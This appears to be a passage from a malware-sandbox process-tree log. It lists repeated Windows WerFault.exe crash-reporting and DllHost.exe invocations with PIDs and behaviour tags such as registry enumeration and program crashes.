C:\Windows\system32\WerFault.exe -pss -s 596 -p 3980 -ip 3980
2⤵
PID:980

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 384 -p 4700 -ip 4700
2⤵
PID:1764

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 1232 -ip 1232
2⤵
PID:548

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 4228 -ip 4228
2⤵
PID:1412

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 3596 -ip 3596
2⤵
PID:3760

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 4120 -ip 4120
2⤵
PID:5036

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 4948 -ip 4948
2⤵
PID:3600

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 4856 -ip 4856
2⤵
PID:3528

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 3372 -ip 3372
2⤵
PID:4328

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 4944 -ip 4944
2⤵
PID:1356

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 4716 -ip 4716
2⤵
PID:2576

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 636 -ip 636
2⤵
PID:492

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 384 -p 3408 -ip 3408
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2900

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 3028 -ip 3028
2⤵
PID:4744

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 1708 -ip 1708
2⤵
PID:2560

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 4480 -ip 4480
2⤵
PID:2348

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 564 -p 5012 -ip 5012
2⤵
PID:3148

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 3652 -ip 3652
2⤵
PID:4140

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 4780 -ip 4780
2⤵
PID:1412

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 4564 -ip 4564
2⤵
PID:2504

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 612 -p 2588 -ip 2588
2⤵
PID:3524

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 552 -p 2276 -ip 2276
2⤵
PID:396

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 612 -p 2264 -ip 2264
2⤵
PID:1156

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 772 -ip 772
2⤵
PID:3148

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 432 -ip 432
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4584

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 2016 -ip 2016
2⤵
PID:2044

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 5116 -ip 5116
2⤵
PID:2520

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 616 -p 2632 -ip 2632
2⤵
PID:4996

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 5004 -ip 5004
2⤵
PID:3316

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 4792 -ip 4792
2⤵
PID:776

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 224 -ip 224
2⤵
PID:3028

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 1528 -ip 1528
2⤵
PID:2412

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 3520 -ip 3520
2⤵
PID:3532

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 1036 -ip 1036
2⤵
PID:2604

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 4580 -ip 4580
2⤵
PID:4272

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 628 -p 5116 -ip 5116
2⤵
PID:1920

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 4868 -ip 4868
2⤵
PID:1360

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 848 -ip 848
2⤵
PID:1284

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 4824 -ip 4824
2⤵
PID:416

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 384 -p 2872 -ip 2872
2⤵
- Checks processor information in registry
PID:4792

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 2044 -ip 2044
2⤵
PID:4384

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 564 -p 4208 -ip 4208
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1428

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 2460 -ip 2460
2⤵
PID:4316

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 3700 -ip 3700
2⤵
PID:4040

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 612 -p 3060 -ip 3060
2⤵
PID:3600

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 564 -p 1784 -ip 1784
2⤵
PID:548

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 1956 -ip 1956
2⤵
PID:1716

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 632 -p 4812 -ip 4812
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3928

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 2640 -ip 2640
2⤵
PID:3240

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 2968 -ip 2968
2⤵
PID:4576

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 616 -p 4804 -ip 4804
2⤵
PID:472

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 5116 -ip 5116
2⤵
PID:2560

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 5012 -ip 5012
2⤵
PID:4364

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 2412 -ip 2412
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:560

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 3816 -ip 3816
2⤵
PID:4648

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 564 -p 2328 -ip 2328
2⤵
PID:3832

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 4192 -ip 4192
2⤵
PID:1336

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 564 -p 4968 -ip 4968
2⤵
PID:2752

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 4040 -ip 4040
2⤵
PID:2276

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 4948 -ip 4948
2⤵
PID:2648

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 384 -p 3148 -ip 3148
2⤵
PID:4456

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 4072 -ip 4072
2⤵
PID:1348

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 4384 -ip 4384
2⤵
PID:5068

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 620 -p 2612 -ip 2612
2⤵
PID:3268

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 608 -p 2908 -ip 2908
2⤵
PID:3884

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 352 -ip 352
2⤵
PID:4272

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 608 -p 3180 -ip 3180
2⤵
PID:3472

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 580 -p 2040 -ip 2040
2⤵
PID:1356

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 1100 -ip 1100
2⤵
PID:4796

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 620 -p 2264 -ip 2264
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4332

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 2916 -ip 2916
2⤵
PID:1680

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 3940 -ip 3940
2⤵
PID:2616

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 628 -p 656 -ip 656
2⤵
PID:4272

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 756 -ip 756
2⤵
PID:4856

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 1320 -ip 1320
2⤵
PID:4504

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 4128 -ip 4128
2⤵
PID:1524

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 1348 -ip 1348
2⤵
- Enumerates system info in registry
PID:1420

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 552 -p 3148 -ip 3148
2⤵
PID:3916

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 1232 -ip 1232
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:728

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 628 -p 1560 -ip 1560
2⤵
PID:3524

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 3896 -ip 3896
2⤵
PID:2284

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 4224 -ip 4224
2⤵
PID:384

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 2256 -ip 2256
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4648

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 5116 -ip 5116
2⤵
PID:2420

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 384 -p 4572 -ip 4572
2⤵
PID:1704

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 2044 -ip 2044
2⤵
PID:2900

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 628 -p 2776 -ip 2776
2⤵
PID:884

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 608 -p 4200 -ip 4200
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4072

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 3948 -ip 3948
2⤵
PID:3840

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 1404 -ip 1404
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3768

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 564 -p 4576 -ip 4576
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1556

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 1956 -ip 1956
2⤵
- Checks processor information in registry
PID:4384

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 3892 -ip 3892
2⤵
PID:4120

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 3552 -ip 3552
2⤵
PID:4924

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 2572 -ip 2572
2⤵
PID:4480

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4676

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:4952

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3644

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4256

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4256 -s 660
2⤵
- Program crash
PID:2620

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3828

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3828 -s 368
2⤵
- Program crash
- Enumerates system info in registry
PID:4856

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:1372

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1372 -s 484
2⤵
- Program crash
PID:772

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3980

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3980 -s 364
2⤵
- Program crash
- Checks processor information in registry
PID:1676

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4700

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4700 -s 484
2⤵
- Program crash
PID:1908

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1232

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1232 -s 472
2⤵
- Program crash
- Checks processor information in registry
PID:1564

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4228

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4228 -s 468
2⤵
- Program crash
- Enumerates system info in registry
PID:4564

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3596

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3596 -s 500
2⤵
- Program crash
PID:4648

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4120

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4120 -s 468
2⤵
- Program crash
- Checks processor information in registry
PID:1884

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4856

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4856 -s 656
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2100

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4948

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4948 -s 388
2⤵
- Program crash
- Checks processor information in registry
PID:4200

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3372

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3372 -s 480
2⤵
- Program crash
- Checks processor information in registry
PID:4436

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4944

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4944 -s 384
2⤵
- Program crash
PID:2416

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4716

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4716 -s 492
2⤵
- Program crash
- Enumerates system info in registry
PID:2832

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 636 -s 492
1⤵
- Program crash
PID:4128

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3408

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3408 -s 228
2⤵
- Program crash
PID:3940

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3028 -s 384
1⤵
- Program crash
PID:1940

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:1708

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1708 -s 428
2⤵
- Program crash
- Checks processor information in registry
PID:3824

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4480

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4480 -s 480
2⤵
- Program crash
PID:496

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5012 -s 400
1⤵
- Program crash
PID:4584

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3652 -s 420
1⤵
- Program crash
PID:4284

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4780 -s 424
1⤵
- Program crash
- Enumerates system info in registry
PID:2256

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2588

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2588 -s 400
2⤵
- Program crash
- Checks processor information in registry
PID:636

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4564 -s 652
1⤵
- Program crash
PID:1668

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2276

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2276 -s 656
2⤵
- Program crash
PID:992

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2264 -s 400
1⤵
- Program crash
PID:4792

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:772

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 772 -s 400
2⤵
- Program crash
PID:3520

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:432

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 432 -s 792
2⤵
- Program crash
PID:3928

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2016

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2016 -s 680
2⤵
- Program crash
PID:1484

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5116 -s 764
1⤵
- Program crash
PID:4264

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2632

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2632 -s 648
2⤵
- Program crash
- Checks processor information in registry
PID:3616

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:5004

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5004 -s 788
2⤵
- Program crash
- Enumerates system info in registry
PID:2348

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:224

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 224 -s 656
2⤵
- Program crash
- Enumerates system info in registry
PID:1548

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4792 -s 388
1⤵
- Program crash
- Enumerates system info in registry
PID:4140

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:1528

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1528 -s 420
2⤵
- Program crash
PID:1420

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3520

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3520 -s 488
2⤵
- Program crash
- Enumerates system info in registry
PID:3596

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1036

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1036 -s 792
2⤵
- Program crash
PID:3268

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4580

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4580 -s 664
2⤵
- Program crash
PID:4500

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5116 -s 812
1⤵
- Program crash
- Checks processor information in registry
PID:1992

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4868

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4868 -s 244
2⤵
- Program crash
- Checks processor information in registry
PID:4680

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 848 -s 772
1⤵
- Program crash
- Enumerates system info in registry
PID:776

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4824

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4824 -s 648
2⤵
- Program crash
PID:1172

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2872

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2872 -s 800
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2416

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4208

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4208 -s 780
2⤵
- Program crash
- Checks processor information in registry
PID:4744

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2044 -s 496
1⤵
- Program crash
PID:2968

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2460

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2460 -s 664
2⤵
- Program crash
PID:4564

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3700

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3700 -s 484
2⤵
- Program crash
PID:1056

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3060

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3060 -s 476
2⤵
- Program crash
PID:1080

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1784

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1784 -s 772
2⤵
- Program crash
PID:3584

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4812

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4812 -s 720
2⤵
- Program crash
PID:4384

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1956 -s 688
1⤵
- Program crash
PID:4924

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2640

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2640 -s 476
2⤵
- Program crash
- Enumerates system info in registry
PID:5008

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2968

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2968 -s 492
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4864

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4804

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4804 -s 688
2⤵
- Program crash
PID:4948

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5116 -s 508
1⤵
- Program crash
PID:5064

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:5012

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5012 -s 400
2⤵
- Program crash
- Enumerates system info in registry
PID:3652

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2412

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2412 -s 724
2⤵
- Program crash
- Enumerates system info in registry
PID:2944

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3816

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3816 -s 400
2⤵
- Program crash
PID:656

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2328 -s 720
1⤵
- Program crash
- Enumerates system info in registry
PID:1940

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4192

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4192 -s 468
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1636

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4968

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4968 -s 768
2⤵
- Program crash
PID:5092

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4948

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4948 -s 656
2⤵
- Program crash
PID:4212

C:\Windows\system32\DllHost.exe
